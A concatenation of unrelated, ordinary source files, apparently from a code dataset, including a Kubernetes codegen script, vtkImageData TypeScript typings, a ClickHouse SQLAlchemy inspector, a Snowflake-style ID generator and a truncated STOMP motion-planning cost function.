            alternatives --install /usr/bin/javaws javaws $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javaws 200000
            alternatives --install /usr/bin/javac javac $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/javac 200000
            alternatives --install /usr/bin/jar jar $JAVA_TARGET_LOCATION/$JAVA_NAME/bin/jar 200000
        ;;
    esac
elif [[ $JAVA_FILE == *.bin ]]; then
    # Self-extracting .bin installer; the echoed newline accepts its prompt.
    echo -e "\n" | sh $JAVA_FILE
else
    echo "Unknown file type: $JAVA_FILE, exiting"
    exit 1
fi
rm $JAVA_FILE
|
<reponame>Ivaant/NodeTest
'use strict';
const person = (name, phone) => ({
name: name,
phone: phone,
});
// console.log(person('Marcus', '+380504560033'));
const phoneBook = [
person('Marcus','+380504727722'),
];
// console.log(phoneBook);
phoneBook.push(person('Iva', '+380405567788'));
phoneBook.push(person('Ant', '+380955507750'));
// console.log(phoneBook);
const findPhoneByName = (name) => {
for (const person of phoneBook) {
if (person.name === name) {
return person.phone;
}
}
};
// console.log(findPhoneByName('Marcus'));
const hashItem = (phoneItem) => ({
[phoneItem.name]: phoneItem.phone,
});
console.log(hashItem(phoneBook[0]));
|
#!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
set -o errexit
set -o nounset
set -o pipefail
KUBE_ROOT=$(dirname "${BASH_SOURCE}")/..
source "${KUBE_ROOT}/hack/lib/init.sh"
kube::golang::setup_env
# Build the four code generators, then invoke each one. Passing --verify-only
# through "$@" makes this script usable by both update- and verify- flows.
BUILD_TARGETS=(
  cmd/libs/go2idl/client-gen
  cmd/libs/go2idl/set-gen
  cmd/libs/go2idl/lister-gen
  cmd/libs/go2idl/informer-gen
)
make -C "${KUBE_ROOT}" WHAT="${BUILD_TARGETS[*]}"
clientgen=$(kube::util::find-binary "client-gen")
setgen=$(kube::util::find-binary "set-gen")
listergen=$(kube::util::find-binary "lister-gen")
informergen=$(kube::util::find-binary "informer-gen")
# Please do not add any logic to this shell script. Add logic to the go code
# that generates the set-gen program.
#
# Collect the package dirs of every served group/version for client-gen.
GROUP_VERSIONS=(${KUBE_AVAILABLE_GROUP_VERSIONS})
GV_DIRS=()
for gv in "${GROUP_VERSIONS[@]}"; do
  # add items, but strip off any leading apis/ you find to match command expectations
  api_dir=$(kube::util::group-version-to-pkg-path "${gv}")
  pkg_dir=${api_dir#apis/}
  # skip groups that aren't being served, clients for these don't matter
  if [[ " ${KUBE_NONSERVER_GROUP_VERSIONS} " == *" ${gv} "* ]]; then
    continue
  fi
  GV_DIRS+=("${pkg_dir}")
done
# delimit by commas for the command
# NOTE(review): the trailing `IFS=$` sets IFS to a literal "$"; harmless here
# because it happens inside the $() subshell, but likely not what was meant.
GV_DIRS_CSV=$(IFS=',';echo "${GV_DIRS[*]// /,}";IFS=$)
# This can be called with one flag, --verify-only, so it works for both the
# update- and verify- scripts.
${clientgen} "$@"
${clientgen} -t "$@"
${clientgen} --clientset-name="release_1_5" --input="${GV_DIRS_CSV}" "$@"
# Clientgen for federation clientset.
${clientgen} --clientset-name=federation_internalclientset --clientset-path=k8s.io/kubernetes/federation/client/clientset_generated --input="../../federation/apis/federation/","api/","extensions/" --included-types-overrides="api/Service,api/Namespace,extensions/ReplicaSet,api/Secret,extensions/Ingress,extensions/Deployment,extensions/DaemonSet,api/ConfigMap,api/Event" "$@"
${clientgen} --clientset-name=federation_release_1_5 --clientset-path=k8s.io/kubernetes/federation/client/clientset_generated --input="../../federation/apis/federation/v1beta1","api/v1","extensions/v1beta1" --included-types-overrides="api/v1/Service,api/v1/Namespace,extensions/v1beta1/ReplicaSet,api/v1/Secret,extensions/v1beta1/Ingress,extensions/v1beta1/Deployment,extensions/v1beta1/DaemonSet,api/v1/ConfigMap,api/v1/Event" "$@"
${setgen} "$@"
# Every package containing a types.go gets listers generated for it.
LISTERGEN_APIS=(
pkg/api
pkg/api/v1
$(
  cd ${KUBE_ROOT}
  find pkg/apis -name types.go | xargs -n1 dirname | sort
)
)
LISTERGEN_APIS=(${LISTERGEN_APIS[@]/#/k8s.io/kubernetes/})
LISTERGEN_APIS=$(IFS=,; echo "${LISTERGEN_APIS[*]}")
${listergen} --input-dirs "${LISTERGEN_APIS}" "$@"
INFORMERGEN_APIS=(
pkg/api
pkg/api/v1
$(
  cd ${KUBE_ROOT}
  # because client-gen doesn't do policy/v1alpha1, we have to skip it too
  find pkg/apis -name types.go | xargs -n1 dirname | sort | grep -v pkg.apis.policy.v1alpha1
)
)
INFORMERGEN_APIS=(${INFORMERGEN_APIS[@]/#/k8s.io/kubernetes/})
INFORMERGEN_APIS=$(IFS=,; echo "${INFORMERGEN_APIS[*]}")
${informergen} \
  --input-dirs "${INFORMERGEN_APIS}" \
  --versioned-clientset-package k8s.io/kubernetes/pkg/client/clientset_generated/release_1_5 \
  --internal-clientset-package k8s.io/kubernetes/pkg/client/clientset_generated/internalclientset \
  --listers-package k8s.io/kubernetes/pkg/client/listers \
  "$@"
# You may add additional calls of code generators like set-gen above.
# call generation on sub-project for now
cmd/kubernetes-discovery/hack/update-codegen.sh
|
#!/bin/bash
# Print an error message (with any arguments appended) to stderr and
# abort the whole script with exit status 255.
reportfailed()
{
    printf '%s\n' "Script failed...exiting. ($*)" >&2
    exit 255
}
# Resolve this script's directory (following symlinks) for locating data files.
export ORGCODEDIR="$(cd "$(dirname $(readlink -f "$0"))" && pwd -P)" || reportfailed
DATADIR="$ORGCODEDIR"
# Defines the step-framework hooks used below: $starting_checks,
# $starting_dependents, $skip_rest_if_already_done, $prev_cmd_failed.
source "$ORGCODEDIR/simple-defaults-for-bashsteps.source"
# Step: create marker file t-fff (idempotent; skipped if it already exists).
# Shared dependency of the two steps below.
mfff()
{
    (
	$starting_checks "Make t-fff"
	cd "$DATADIR"
	[ -f t-fff ]
	$skip_rest_if_already_done; set -e
	date >t-fff
    ) ; $prev_cmd_failed
}
# Step: create t-ddd, after ensuring its dependency t-fff exists.
(
    $starting_dependents "Make t-ddd"
    mfff
    $starting_checks
    cd "$DATADIR"
    [ -f t-ddd ]
    $skip_rest_if_already_done; set -e
    date >t-ddd
) ; $prev_cmd_failed
# Step: create t-eee, also depending on t-fff (mfff is safe to call twice).
(
    $starting_dependents "Make t-eee"
    mfff
    $starting_checks
    cd "$DATADIR"
    [ -f t-eee ]
    $skip_rest_if_already_done; set -e
    date >t-eee
) ; $prev_cmd_failed
|
/**
 * Asserts that a value is an instance of a given type.
 *
 * @param value The value to test.
 * @param type The constructor of which value must be an instance.
 * @return The value, narrowed to T.
 * @throws {TypeError} if the value is not an instance of `type`.
 */
export function assertType<T>(value: any, type: new (...args: any) => T): T {
    if (!(value instanceof type)) {
        throw new TypeError(
            `Expected value of type: ${type} but got ${typeof value}`
        );
    }
    return value as T;
}
/**
 * Locates the first instance of a given type within an array.
 *
 * @param container The array to search.
 * @param type The constructor of which the located value must be an instance.
 * @return The located value.
 * @throws {TypeError} if no element of `container` is an instance of `type`.
 */
export function findInstanceOf<A, T extends A>(
    container: A[],
    type: new (...args: any) => T
) {
    for (const candidate of container) {
        if (candidate instanceof type) {
            return candidate as T;
        }
    }
    throw new TypeError(`Array does not contain a value of type: ${type}`);
}
|
def calculate_square_root(n):
    """Compute the square root of ``n`` with Newton's (Babylonian) method.

    Parameters
    ----------
    n : number
        Non-negative value whose square root is wanted.

    Returns
    -------
    float
        An approximation of sqrt(n).

    Raises
    ------
    ValueError
        If ``n`` is negative (the original silently returned ``n``).
    """
    if n < 0:
        raise ValueError("cannot take the square root of a negative number")
    if n == 0:
        # The original divided by zero here (n/x with x == 0).
        return 0.0
    # Convergence tolerance for the iteration below.
    small_number = 0.0000001
    # Start from max(n, 1): the original started at x = n, which returned
    # immediately (and wrongly) for 0 < n < 1 because x - n/x was negative.
    x = n if n >= 1 else 1.0
    # Babylonian iteration: x converges to sqrt(n) from above.
    while (x - n/x > small_number):
        x = (x + n/x)/2
    return x
|
const password = document.getElementById("password");
const toggle = document.getElementById("toggle");

// Toggle the password field between masked and plain-text display,
// adding the "hide" class to the toggle icon while the text is visible.
function showHide() {
  const isMasked = password.type === "password";
  password.setAttribute("type", isMasked ? "text" : "password");
  toggle.classList.toggle("hide", isMasked);
}
const modal = document.querySelector(".modal");
const previews = document.querySelectorAll(".gallery img");
const original = document.querySelector(".full-img");
const caption = document.querySelector(".caption");

// Open the lightbox when a gallery thumbnail is clicked.
// BUG FIX: the original executed this body once per preview at load time,
// opening the modal immediately for every image instead of registering a
// click handler.
previews.forEach((preview) => {
  preview.addEventListener("click", () => {
    modal.classList.add("open");
    original.classList.add("open");
    // Dynamically change text and image
    const originalSrc = preview.getAttribute("data-original");
    original.src = `./full/${originalSrc}`;
    const altText = preview.alt;
    caption.textContent = altText;
  });
});

// Close the lightbox only when the backdrop itself (not the image) is clicked.
modal.addEventListener("click", (e) => {
  if (e.target.classList.contains("modal")) {
    modal.classList.remove("open");
    original.classList.remove("open");
  }
});
|
<gh_stars>0
import ImageZoom from './src/image-zoom/image-zoom.component';
export default ImageZoom;
|
import { mat3, mat4, ReadonlyVec3, vec3 } from 'gl-matrix';
import { Bounds, Vector3 } from '../../../types';
import vtkDataSet, { IDataSetInitialValues } from '../DataSet';
/**
 * Initial values accepted when constructing a vtkImageData: extends the base
 * dataset initial values with the image grid's geometry.
 */
export interface IImageDataInitialValues extends IDataSetInitialValues {
  // Distance between adjacent samples along each axis — presumably [sx, sy, sz]; confirm.
  spacing?: number[];
  // Position of the first sample in world coordinates — presumably [ox, oy, oz]; confirm.
  origin?: number[];
  // Index-space range, six values — presumably [iMin, iMax, jMin, jMax, kMin, kMax]; confirm.
  extent?: number[];
}
// Summary statistics returned by vtkImageData.computeHistogram().
interface IComputeHistogram {
  minimum: number;
  maximum: number;
  average: number;
  variance: number;
  sigma: number;
}
export interface vtkImageData extends vtkDataSet {
  /**
   * Returns an object with `{ minimum, maximum, average, variance, sigma }`
   * of the imageData points found within the provided `worldBounds`.
   *
   * `voxelFunc(index, bounds)` is an optional function that is called with
   * the `[i,j,k]` index and index `bounds`, expected to return truthy if the
   * data point should be counted in the histogram, and falsey if not.
   * @param {Number[]} worldBounds The bounds of the world.
   * @param [voxelFunc]
   */
  computeHistogram(worldBounds: number[], voxelFunc?: any): IComputeHistogram;
  /**
   * Returns an `array[3]` of values to multiply an `[i,j,k]` index to convert
   * into the actual data array index, from the provided extent.
   * `numberOfComponents` should match the Scalar components.
   * @internal
   * @param {Number[]} extent
   * @param {Number} [numberOfComponents]
   */
  computeIncrements(extent: number[], numberOfComponents?: number): number[]
  /**
   * Converts an `[i,j,k]` index to the flat data array index. Returns `NaN`
   * if any of the i,j,k bounds are outside the data Extent.
   * @internal
   * @param {Number[]} ijk The localized `[i,j,k]` pixel array position. Float values will be rounded.
   * @return {Number} the corresponding flattened index in the scalar array
   */
  computeOffsetIndex(ijk: number[]): number;
  /**
   * Calculates the `indexToWorld` and `worldToIndex` conversion matrices from
   * the origin, direction, and spacing. Shouldn't need to call this as it is
   * handled internally, and updated whenever the vtkImageData is modified.
   * @internal
   */
  computeTransforms(): void;
  /**
   * Returns a bounds array from a given Extent, useful if you need to
   * calculate the world bounds of a subset of the imageData's data.
   * @internal
   * @param {Number[]} ex
   */
  extentToBounds(ex: number[]): number[];
  /**
   * The Bounds of a vtkImage are returned as pairs of world coordinates
   * ```[x_min, x_max, y_min, y_max, z_min, z_max]``` these are calculated
   * from the Extent, Origin, and Spacing, defined
   * through
   * ```js
   * bounds[6] =
   * [
   * i_min*Spacing[0] + Origin[0], i_max*Spacing[0] + Origin[0],
   * j_min*Spacing[1] + Origin[1], j_max*Spacing[1] + Origin[1],
   * k_min*Spacing[2] + Origin[2], k_max*Spacing[2] + Origin[2]
   * ];
   * ```
   * You can't directly set the bounds. First you need to decide how many
   * pixels across your image will be (i.e. what the extent should be), and
   * then you must find the origin and spacing that will produce the bounds
   * that you need from the extent that you have. This is simple algebra. In
   * general, always set the extent to start at zero, e.g. `[0, 9, 0, 9, 0,
   * 9]` for a 10x10x10 image. Calling `setDimensions(10,10,10)` does exactly
   * the same thing as `setExtent(0,9,0,9,0,9)` but you should always do the
   * latter to be explicit about where your extent starts.
   * @return {Bounds} The bounds for the mapper.
   */
  getBounds(): Bounds;
  /**
   * Get the `[x,y,z]` location of the center of the imageData.
   */
  getCenter(): number[];
  /**
   * Get dimensions of this structured points dataset. It is the number of
   * points on each axis. Dimensions are computed from Extents during this
   * call.
   */
  getDimensions(): number[];
  /**
   * Direction is a `mat3` matrix corresponding to the axes directions in
   * world coordinates for the I, J, K axes of the image. Direction must form
   * an orthonormal basis.
   */
  getDirection(): mat3;
  /**
   * The maximal extent of the projection.
   * @default [0, -1, 0, -1, 0, -1]
   */
  getExtent(): number[];
  /**
   * Same as `getExtent`, but the internal extent array is returned by
   * reference rather than as a copy.
   * @default [0, -1, 0, -1, 0, -1]
   */
  getExtentByReference(): number[];
  /**
   * Returns the data array index for the point at the provided world position.
   * @param {Number[]} xyz The [x,y,z] array in world coordinates.
   * @return {number|NaN} the corresponding pixel's index in the scalar array.
   */
  getOffsetIndexFromWorld(xyz: number[]): number;
  /**
   * Get the number of cells composing the dataset.
   */
  getNumberOfCells(): number;
  /**
   * Get the number of points composing the dataset.
   */
  getNumberOfPoints(): number;
  /**
   * Get the world position of a data point. Index is the point's index in the
   * 1D data array.
   * @param index
   */
  getPoint(index: number): number[];
  /**
   * Get the origin of the dataset. The origin is the position in world
   * coordinates of the point of extent (0,0,0). This point does not have to
   * be part of the dataset, in other words, the dataset extent does not have
   * to start at (0,0,0) and the origin can be outside of the dataset bounding
   * box. The origin plus spacing determine the position in space of the
   * points.
   */
  getOrigin(): number[];
  /**
   * Same as `getOrigin`, but the internal origin array is returned by
   * reference rather than as a copy.
   */
  getOriginByReference(): number[];
  /**
   * Returns the scalar value for the point at the provided world position, or
   * `NaN` if the world bounds are outside the volumeData bounds. `comp` is
   * the scalar component index, for multi-component scalar data.
   * @param {Number[]} xyz The [x,y,z] array in world coordinates.
   * @param {Number} [comp] The scalar component index for multi-component scalars.
   * @return {number|NaN} The corresponding pixel's scalar value.
   */
  getScalarValueFromWorld(xyz: number[], comp?: number): number;
  /**
   * Get the spacing [width, height, length] of the cubical cells that compose
   * the data set.
   */
  getSpacing(): number[];
  /**
   * Same as `getSpacing`, but the internal spacing array is returned by
   * reference rather than as a copy.
   */
  getSpacingByReference(): number[];
  /**
   * Returns the `mat4` matrices used to convert between world and index.
   * `worldToIndex` is the inverse matrix of `indexToWorld`. Both are made
   * with `Float64Array`.
   */
  getIndexToWorld(): mat4;
  /**
   * Returns the `mat4` matrices used to convert between world and index.
   * `worldToIndex` is the inverse matrix of `indexToWorld`. Both are made
   * with `Float64Array`.
   */
  getWorldToIndex(): mat4;
  /**
   * this is the fast version, requires vec3 arguments
   * @param {ReadonlyVec3} vin
   * @param {vec3} vout
   */
  indexToWorldVec3(vin: ReadonlyVec3, vout: vec3): vec3;
  /**
   * Converts the input index vector `[i,j,k]` to world values `[x,y,z]`.
   * Modifies the out vector array in place, but also returns it.
   * @param {ReadonlyVec3} ain
   * @param {vec3} aout
   */
  indexToWorld(ain: ReadonlyVec3, aout: vec3): vec3;
  /**
   * Calculate the corresponding world bounds for the given index bounds
   * `[i_min, i_max, j_min, j_max, k_min, k_max]`. Modifies `out` in place if
   * provided, or returns a new array.
   * @param {Number[]} bin
   * @param {Number[]} [bout]
   */
  indexToWorldBounds(bin: number[], bout?: number[]): number[];
  /**
   * Set the values of the extent, from `0` to `(i-1)`, etc.
   * @param dims
   */
  setDimensions(dims: number[]): void;
  /**
   * Set the values of the extent, from `0` to `(i-1)`, etc.
   * @param i
   * @param j
   * @param k
   */
  setDimensions(i: number, j: number, k: number): void;
  /**
   * The direction matrix is a 3x3 basis for the I, J, K axes
   * of the image. The rows of the matrix correspond to the
   * axes directions in world coordinates. Direction must
   * form an orthonormal basis, results are undefined if
   * it is not.
   * @param {mat3} direction
   */
  setDirection(direction: mat3): boolean;
  /**
   * The direction matrix is a 3x3 basis for the I, J, K axes
   * of the image. The rows of the matrix correspond to the
   * axes directions in world coordinates. Direction must
   * form an orthonormal basis, results are undefined if
   * it is not.
   * @param e00
   * @param e01
   * @param e02
   * @param e10
   * @param e11
   * @param e12
   * @param e20
   * @param e21
   * @param e22
   */
  setDirection(e00: number, e01: number, e02: number, e10: number, e11: number, e12: number, e20: number, e21: number, e22: number): boolean;
  /**
   * Set the extent.
   * @param extent
   */
  setExtent(extent: number[]): boolean;
  /**
   * Set the extent from its six individual components.
   * @param {Number} x1 The x coordinate of the first point.
   * @param {Number} x2 The x coordinate of the second point.
   * @param {Number} y1 The y coordinate of the first point.
   * @param {Number} y2 The y coordinate of the second point.
   * @param {Number} z1 The z coordinate of the first point.
   * @param {Number} z2 The z coordinate of the second point.
   */
  setExtent(x1: number, x2: number, y1: number, y2: number, z1: number, z2: number): void;
  /**
   * Set the origin of the image.
   * @param {Vector3} origin The coordinate of the origin point.
   */
  setOrigin(origin: Vector3): boolean;
  /**
   * Set the origin of the image.
   * @param {Vector3} origin The coordinate of the origin point.
   */
  setOriginFrom(origin: Vector3): boolean;
  /**
   * Set the spacing [width, height, length] of the cubical cells that compose
   * the data set.
   * @param spacing
   */
  setSpacing(spacing: number[]): boolean;
  /**
   * Set the spacing by copying the values from the provided array.
   * @param spacing
   */
  setSpacingFrom(spacing: number[]): boolean;
  /**
   * this is the fast version, requires vec3 arguments
   * @param vin
   * @param vout
   */
  worldToIndexVec3(vin: ReadonlyVec3, vout: vec3): vec3;
  /**
   * Converts the input world vector `[x,y,z]` to approximate index values
   * `[i,j,k]`. Should be rounded to integers before attempting to access the
   * index. Modifies the out vector array in place, but also returns it.
   * @param ain
   * @param aout
   */
  worldToIndex(ain: ReadonlyVec3, aout: vec3): vec3;
  /**
   * Calculate the corresponding index bounds for the given world bounds
   * `[x_min, x_max, y_min, y_max, z_min, z_max]`. Modifies `out` in place if
   * provided, or returns a new array.
   * @param {Number[]} bin
   * @param {Number[]} [bout]
   */
  worldToIndexBounds(bin: number[], bout?: number[]): number[];
}
/**
 * Method used to decorate a given object (publicAPI+model) with vtkImageData characteristics.
 *
 * @param publicAPI object on which methods will be bound (public)
 * @param model object on which data structure will be bound (protected)
 * @param {IImageDataInitialValues} [initialValues] (default: {})
 */
export function extend(publicAPI: object, model: object, initialValues?: IImageDataInitialValues): void;
/**
 * Method used to create a new instance of vtkImageData.
 * @param {IImageDataInitialValues} [initialValues] for pre-setting some of its content
 */
export function newInstance(initialValues?: IImageDataInitialValues): vtkImageData;
/**
 * vtkImageData is a data object that is a concrete implementation of
 * vtkDataSet. vtkImageData represents a geometric structure that is a
 * topological and geometrical regular array of points. Examples include volumes
 * (voxel data) and pixmaps. All vtkDataSet functions are inherited.
 */
export declare const vtkImageData: {
  newInstance: typeof newInstance,
  extend: typeof extend,
};
export default vtkImageData;
|
<reponame>Fozar/clickhouse-sqlalchemy
from sqlalchemy.engine import reflection
from clickhouse_sqlalchemy import Table, engines
class ClickHouseInspector(reflection.Inspector):
    """SQLAlchemy inspector that additionally reflects ClickHouse engines."""
    def reflect_table(self, table, *args, **kwargs):
        """Reflect ``table`` and attach its ClickHouse engine definition.

        A plain ``sqlalchemy.Table`` is first replaced in its metadata by a
        ``clickhouse_sqlalchemy.Table`` so the engine can be stored on it.
        """
        # This check is necessary to support direct instantiation of
        # `clickhouse_sqlalchemy.Table` and then reflection of it.
        if not isinstance(table, Table):
            table.metadata.remove(table)
            ch_table = Table._make_from_standard(
                table, _extend_on=kwargs.get('_extend_on')
            )
        else:
            ch_table = table
        super(ClickHouseInspector, self).reflect_table(
            ch_table, *args, **kwargs
        )
        with self._operation_context() as conn:
            schema = conn.schema_for_object(ch_table)
            self._reflect_engine(ch_table.name, schema, ch_table)
    def _reflect_engine(self, table_name, schema, table):
        """Attach the reflected engine to ``table`` (``None`` if unknown).

        Does nothing unless the dialect supports (and has enabled) engine
        reflection.

        Raises:
            ValueError: if no engine description exists for the table.
        """
        should_reflect = (
            self.dialect.supports_engine_reflection and
            self.dialect.engine_reflection
        )
        if not should_reflect:
            return
        # NOTE(review): assumes engines.__all__ holds the engine *classes*
        # themselves (not name strings, the usual __all__ convention) —
        # confirm against the engines module.
        engine_cls_by_name = {e.__name__: e for e in engines.__all__}
        e = self.get_engine(table_name, schema=table.schema)
        if not e:
            raise ValueError("Cannot find engine for table '%s'" % table_name)
        engine_cls = engine_cls_by_name.get(e['engine'])
        if engine_cls is not None:
            engine = engine_cls.reflect(table, **e)
            engine._set_parent(table)
        else:
            table.engine = None
    def get_engine(self, table_name, schema=None, **kw):
        """Return the dialect's engine description dict for ``table_name``."""
        with self._operation_context() as conn:
            return self.dialect.get_engine(
                conn, table_name, schema=schema, info_cache=self.info_cache,
                **kw
            )
|
package com.ordernumber.service.impl;
import java.text.SimpleDateFormat;
import java.util.Date;
/**
 * Twitter Snowflake variant<br>
 * The SnowFlake layout is adapted to business needs (parts separated by -):<br>
 * bizCode (business code) + 201805051212 (date) + 4096 (random within the same millisecond)<br>
 */
/****
 * @ClassName: SnowflakeIdVariant
 * @Description: Generates unique, time-ordered id strings.
 * @author ccc520
 * @date 2018-06-05 08:44:27
 * @modificationHistory=============== record of major logic/functional changes
 * @modify by user: (modifier)
 * @modify by reason: (reason for change)
 */
public class SnowflakeIdVariant {
// ==============================Fields===========================================
/** 序列在id中占的位数 */
private final long sequenceBits = 12L;
/** 生成序列的掩码,这里为4095 (0b111111111111=0xfff=4095) */
private final long sequenceMask = -1L ^ (-1L << sequenceBits);
/** 毫秒内序列(0~4095) */
private long sequence = 0L;
/** 上次生成ID的时间截 */
private long lastTimestamp = -1L;
private static ThreadLocal<SimpleDateFormat> threadLocal = new ThreadLocal<SimpleDateFormat>() {
@Override
protected SimpleDateFormat initialValue() {
return new SimpleDateFormat("yyyyMMddhhmmssSSS");
}
};
//==============================Constructors=====================================
/**
* 构造函数
*/
public SnowflakeIdVariant() {}
// ==============================Methods==========================================
/**
* 获得下一个ID (该方法是线程安全的)
* @return SnowflakeId
*/
public synchronized String nextId(String machineId, String bizCode) {
long timestamp = timeGen();
//如果当前时间小于上一次ID生成的时间戳,说明系统时钟回退过这个时候应当抛出异常
if (timestamp < lastTimestamp) {
throw new RuntimeException(
String.format("Clock moved backwards. Refusing to generate id for %d milliseconds", lastTimestamp - timestamp));
}
//如果是同一时间生成的,则进行毫秒内序列
if (lastTimestamp == timestamp) {
sequence = (sequence + 1) & sequenceMask;
//毫秒内序列溢出
if (sequence == 0) {
//阻塞到下一个毫秒,获得新的时间戳
timestamp = tilNextMillis(lastTimestamp);
}
}
//时间戳改变,毫秒内序列重置
else {
sequence = 0L;
}
//上次生成ID的时间截
lastTimestamp = timestamp;
//移位并通过或运算拼到一起组成64位的ID
return bizCode + machineId + (threadLocal.get().format(new Date(timestamp))) + sequence;
}
/**
* 阻塞到下一个毫秒,直到获得新的时间戳
* @param lastTimestamp 上次生成ID的时间截
* @return 当前时间戳
*/
protected long tilNextMillis(long lastTimestamp) {
long timestamp = timeGen();
while (timestamp <= lastTimestamp) {
timestamp = timeGen();
}
return timestamp;
}
/**
* 返回以毫秒为单位的当前时间
* @return 当前时间(毫秒)
*/
protected long timeGen() {
return System.currentTimeMillis();
}
//==============================Test=============================================
/** 测试 */
public static void main(String[] args) throws InterruptedException {
SnowflakeIdVariant idWorker = new SnowflakeIdVariant();
long time1 = System.currentTimeMillis();
for (int i = 0; i < 100000; i++) {
String id = idWorker.nextId("001","ORC");
//Thread.sleep(1);
System.out.println(id);
}
System.out.println(System.currentTimeMillis()-time1);
}
}
|
<gh_stars>0
/**
* @file tool_goal_pose.cpp
* @brief This defines a cost function for tool goal pose.
*
* @author <NAME>
* @date June 2, 2016
* @version TODO
* @bug No known bugs
*
* @copyright Copyright (c) 2016, Southwest Research Institute
*
* @par License
* Software License Agreement (Apache License)
* @par
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
* http://www.apache.org/licenses/LICENSE-2.0
* @par
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <math.h>
#include <stomp_plugins/cost_functions/tool_goal_pose.h>
#include <XmlRpcException.h>
#include <pluginlib/class_list_macros.h>
#include <ros/console.h>
PLUGINLIB_EXPORT_CLASS(stomp_moveit::cost_functions::ToolGoalPose,stomp_moveit::cost_functions::StompCostFunction);
// Number of cartesian degrees of freedom (3 translation + 3 rotation).
static const int CARTESIAN_DOF_SIZE = 6;
// Fallback tolerances applied when the goal supplies none (see setMotionPlanRequest).
static const double DEFAULT_POS_TOLERANCE = 0.001;
static const double DEFAULT_ROT_TOLERANCE = 0.01;
// The maximum twist error is the tolerance scaled by these ratios; errors are
// normalized into the [tolerance, tolerance*ratio] range in computeCosts.
static const double POS_MAX_ERROR_RATIO = 10.0;
static const double ROT_MAX_ERROR_RATIO = 10.0;
namespace stomp_moveit
{
namespace cost_functions
{
// Default-constructs the cost function; real setup happens in initialize().
ToolGoalPose::ToolGoalPose():
    name_("ToolGoalPose")
{
  // TODO Auto-generated constructor stub
}
ToolGoalPose::~ToolGoalPose()
{
  // TODO Auto-generated destructor stub
}
// Stores the planning group and robot model, then loads the cost weights
// from 'config' via configure().
bool ToolGoalPose::initialize(moveit::core::RobotModelConstPtr robot_model_ptr,
                        const std::string& group_name,XmlRpc::XmlRpcValue& config)
{
  group_name_ = group_name;
  robot_model_ = robot_model_ptr;
  return configure(config);
}
// Reads 'position_cost_weight' and 'orientation_cost_weight' from the plugin
// configuration. Returns false (after logging) when either entry is missing
// or has the wrong XmlRpc type.
bool ToolGoalPose::configure(const XmlRpc::XmlRpcValue& config)
{
  using namespace XmlRpc;
  try
  {
    // Non-const copy: XmlRpcValue::operator[] is non-const and may throw
    // XmlRpcException on a missing key or bad cast.
    XmlRpcValue params = config;
    position_cost_weight_ = static_cast<double>(params["position_cost_weight"]);
    orientation_cost_weight_ = static_cast<double>(params["orientation_cost_weight"]);
    // total weight
    cost_weight_ = position_cost_weight_ + orientation_cost_weight_;
  }
  catch(XmlRpc::XmlRpcException& e)
  {
    ROS_ERROR("%s failed to load parameters, %s",getName().c_str(),e.getMessage().c_str());
    return false;
  }
  return true;
}
// Extracts the cartesian tool goal pose and tolerance from the motion plan
// request. A cartesian goal constraint is preferred; otherwise the goal pose
// is computed by FK from the joint-constraint goal and default tolerances
// are used. Also derives the [min, max] twist-error range used by
// computeCosts to normalize errors.
bool ToolGoalPose::setMotionPlanRequest(const planning_scene::PlanningSceneConstPtr& planning_scene,
                 const moveit_msgs::MotionPlanRequest &req,
                 const stomp_core::StompConfiguration &config,
                 moveit_msgs::MoveItErrorCodes& error_code)
{
  using namespace Eigen;
  using namespace moveit::core;
  const JointModelGroup* joint_group = robot_model_->getJointModelGroup(group_name_);
  int num_joints = joint_group->getActiveJointModels().size();
  // The tool is assumed to be the last link of the planning group.
  tool_link_ = joint_group->getLinkModelNames().back();
  state_.reset(new RobotState(robot_model_));
  robotStateMsgToRobotState(req.start_state,*state_);
  const std::vector<moveit_msgs::Constraints>& goals = req.goal_constraints;
  if(goals.empty())
  {
    ROS_ERROR("A goal constraint was not provided");
    error_code.val = error_code.INVALID_GOAL_CONSTRAINTS;
    return false;
  }
  // storing tool goal pose
  bool found_goal = false;
  for(const auto& g: goals)
  {
    if(utils::kinematics::isCartesianConstraints(g))
    {
      // tool cartesian goal data
      state_->updateLinkTransforms();
      Eigen::Affine3d start_tool_pose = state_->getGlobalLinkTransform(tool_link_);
      boost::optional<moveit_msgs::Constraints> cartesian_constraints = utils::kinematics::curateCartesianConstraints(g,start_tool_pose);
      if(cartesian_constraints.is_initialized())
      {
        found_goal = utils::kinematics::decodeCartesianConstraint(robot_model_,cartesian_constraints.get(),tool_goal_pose_,
                                                                  tool_goal_tolerance_,robot_model_->getRootLinkName());
        ROS_DEBUG_STREAM("ToolGoalTolerance cost function will use tolerance: "<<tool_goal_tolerance_.transpose());
      }
      // NOTE(review): if the cartesian constraint fails to decode, this
      // break leaves found_goal == false and tool_goal_tolerance_ unset,
      // yet the error range below is still computed from it — confirm
      // whether falling through to the joint-constraint path was intended.
      break;
    }
    if(!found_goal)
    {
      ROS_DEBUG("%s a cartesian goal pose in MotionPlanRequest was not provided,calculating it from FK",getName().c_str());
      // check joint constraints
      if(g.joint_constraints.empty())
      {
        ROS_ERROR_STREAM("No joint values for the goal were found");
        error_code.val = error_code.INVALID_GOAL_CONSTRAINTS;
        return false;
      }
      // compute FK to obtain tool pose
      const std::vector<moveit_msgs::JointConstraint>& joint_constraints = g.joint_constraints;
      // copying goal values into state
      for(auto& jc: joint_constraints)
      {
        state_->setVariablePosition(jc.joint_name,jc.position);
      }
      // storing tool goal pose and tolerance
      state_->update(true);
      tool_goal_pose_ = state_->getGlobalLinkTransform(tool_link_);
      tool_goal_tolerance_.resize(CARTESIAN_DOF_SIZE);
      double ptol = DEFAULT_POS_TOLERANCE;
      double rtol = DEFAULT_ROT_TOLERANCE;
      tool_goal_tolerance_ << ptol, ptol, ptol, rtol, rtol, rtol;
      found_goal = true;
      break;
    }
  }
